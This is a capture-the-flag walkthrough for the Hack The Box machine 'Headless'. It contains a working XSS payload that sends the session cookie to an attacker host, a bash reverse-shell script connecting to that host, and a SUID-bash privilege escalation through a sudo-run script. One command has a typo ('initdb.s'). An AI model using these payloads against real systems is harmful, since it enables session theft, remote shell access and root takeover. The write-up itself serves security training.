# Headless HTB

There are two ports open:

```
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

```

Checking port 5000 there is a website and ther is a support section that might be susceptible to XSS ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-dbdb68731fb97abc2443a32cde0fc8acb505041a%2F73d82d4ecb5068add7298d3a31f8834c.png?alt=media) Now trying to get the cookie as there is a cookie called is\_admin but it is hashed. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ea17a351b653586e6e8193a7b699bc2e52dc125d%2F86e4e5ac5f77610556a32c7906488dfc.png?alt=media) Now running a webserver on host and using the following XSS payload:

```html
<img src=x onerror=fetch('http://10.10.14.37/'+document.cookie);>
```

We get the cookie value: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-f79dc970012092571987417b6f7161befcf36b14%2Fbc95e7a9393251cdae4ee7e38cff04d1.png?alt=media) Using gobuster discovered /dashboard

Now using this cookie we can access /dashboard ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-09caf33e7fc34fe14352fde6ae94a1120fe0ee55%2Fd3a2475335f1cd92780d05443ef21ebf.png?alt=media) There is a code execution here Now writing a shell.sh.

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.37/9005 0>&1
```

And using burpsuite to intercept: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d6751bc8ecb03aeab1fb4990a56b26c8557a4388%2F4108bdd8ee6868856918d0d93df01cfa.png?alt=media) Now we get a shell![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d9a73c92746fbf3ce73ffa4854d73eeab58ef8bc%2F8f45c417fadf086fbde0efd39f37c3e3.png?alt=media) We have sudo privilege over syscheck. Now checking the application with strings. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c4db4ed2b8fc2d52ac64638c8f5b599457a06065%2F81bfce9bb760116a81e11c1521e883b4.png?alt=media) It is calling initdb.sh We can add something malicious in initdb.sh

```
echo "chmod u+s /bin/bash" > initdb.s
chmod +x initdb.sh
```

Now can run

```
sudo /usr/bin/syscheck
/bin/bash -p
```

And we get a root shell: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7457a3ab0c3bd58bc6cf5877920e68362615e968%2F3cf96077b5fb778e006bd48e3801dcaa.png?alt=media)